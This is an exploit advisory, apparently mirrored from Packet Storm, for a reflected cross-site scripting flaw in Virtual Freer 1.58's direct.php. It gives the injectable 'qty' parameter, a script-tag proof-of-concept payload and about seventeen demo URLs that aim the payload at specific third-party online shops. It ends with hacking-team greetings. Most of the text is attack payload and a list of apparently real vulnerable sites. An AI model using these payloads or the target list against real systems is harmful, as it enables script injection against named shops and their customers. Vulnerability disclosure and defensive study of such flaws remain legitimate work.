Virtual Freer 1.58 Cross Site Scripting

🗓️ 01 Apr 2016 00:00:00Reported by Milad HackingType

packetstorm🔗 packetstormsecurity.com👁 31 Views

Virtual Freer 1.58 Reflected Cross Site Scripting vulnerability discovered by Milad Hacking in 2016, allows attackers to execute malicious scripts via direct.php

`[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]  
[+]  
[+] Exploit Title: Virtual Freer Reflected Cross Site Scripting  
[+]  
[+] Exploit Author: Milad Hacking  
[+]  
[+] Discovered By: Milad Hacking  
[+]  
[+] Vendor Homepage : http://freer.ir/virtual/  
[+]  
[+] Date: 2016-03-01  
[+]  
[+] Tested on: Kali Linux / lceweasel  
[+]  
[+] Software link : http://freer.ir/virtual/download.php?action=get  
[+]  
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]  
  
[+] Screenshot : http://up.ashiyane.org/images/sg53t4duy1n2g5xnfwm5.png  
  
[+] Location : site.com/direct.php?card=[cartid]&qty=1"><script>alert(/xss testing/)</script>  
  
[+] Demo :  
  
  
http://shop.azcam-ultra.ir/direct.php?card=19&qty=1%22%3E%3Cscript%3Ealert%28/xss%20testing/%29%3C/script%3E  
  
http://usaid.ir/Foroshgah/direct.php?card=21&qty=1%22%3E%3Cscript%3Ealert%28/xss%20testing/%29%3C/script%3E  
  
http://inet2.ir/direct.php?card=12&qty=1%22%3E%3Cscript%3Ealert%28/xss%20testing/%29%3C/script%3E  
  
http://pay-me.ir/direct.php?card=5&qty=1%22%3E%3Cscript%3Ealert%28/xss%20testing/%29%3C/script%3E  
  
http://pingbaz.ir/shop/direct.php?card=1&qty=1%22%3E%3Cscript%3Ealert%28/xss%20testing/%29%3C/script%3E  
  
http://tx149.ir/shop/direct.php?card=7&qty=1%22%3E%3Cscript%3Ealert%28/xss%20testing/%29%3C/script%3E  
  
http://shop.mihannod.ir/direct.php?card=7&qty=1%22%3E%3Cscript%3Ealert%28/xss%20testing/%29%3C/script%3E  
  
http://store.parseset.ir/direct.php?card=3&qty=1%22%3E%3Cscript%3Ealert%28/xss%20testing/%29%3C/script%3E  
  
http://tx166.ir/shop/direct.php?card=25&qty=1%22%3E%3Cscript%3Ealert%28/xss%20testing/%29%3C/script%3E  
  
http://instaliker.ir/store/direct.php?card=19&qty=1%22%3E%3Cscript%3Ealert%28/xss%20testing/%29%3C/script%3E  
  
http://support-sara.tk/pay/direct.php?card=22&qty=1%22%3E%3Cscript%3Ealert%28/xss%20testing/%29%3C/script%3E  
  
https://mokhaberat.net/factor/direct.php?card=1&qty=1%22%3E%3Cscript%3Ealert%28/xss%20testing/%29%3C/script%3E  
  
http://pinguin.ir/direct.php?card=12&qty=1%22%3E%3Cscript%3Ealert%28/xss%20testing/%29%3C/script%3E  
  
http://www.pay-ment.ir/direct.php?card=2&qty=1%22%3E%3Cscript%3Ealert%28/xss%20testing/%29%3C/script%3E  
  
http://vip.irantournament.ir/direct.php?card=44&qty=1%22%3E%3Cscript%3Ealert%28/xss%20testing/%29%3C/script%3E  
  
http://anaz.ir/mellat2/direct.php?card=44&qty=1%22%3E%3Cscript%3Ealert%28/xss%20testing/%29%3C/script%3E  
  
http://shoping.hanakala.ir/direct.php?card=24&qty=1%22%3E%3Cscript%3Ealert%28/xss%20testing/%29%3C/script%3E  
  
Ya FaTeme Zahra  
  
[+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+]  
  
Special thanks to: iliya Norton - Milad Hacking - Mohamad Ghasemi  
- irhblackhat - Distr0watch - N3TC4T - Ac!D - Mr.G}{o$t - MRS4JJ4D - Nazila Blackhat - Bl4ck_MohajeM -   
Ehsan Hosseini - Ali Inject0r - Peyman C4t And All Ashiyane Digital Security Team  
  
[+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+]  
  
Greetz to: My Lord Allah  
https://telegram.me/thehacking  
http://upbash.ir  
[email protected]  
[+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+]  
`

01 Apr 2016 00:00Current

7.4High risk

Vulners AI Score7.4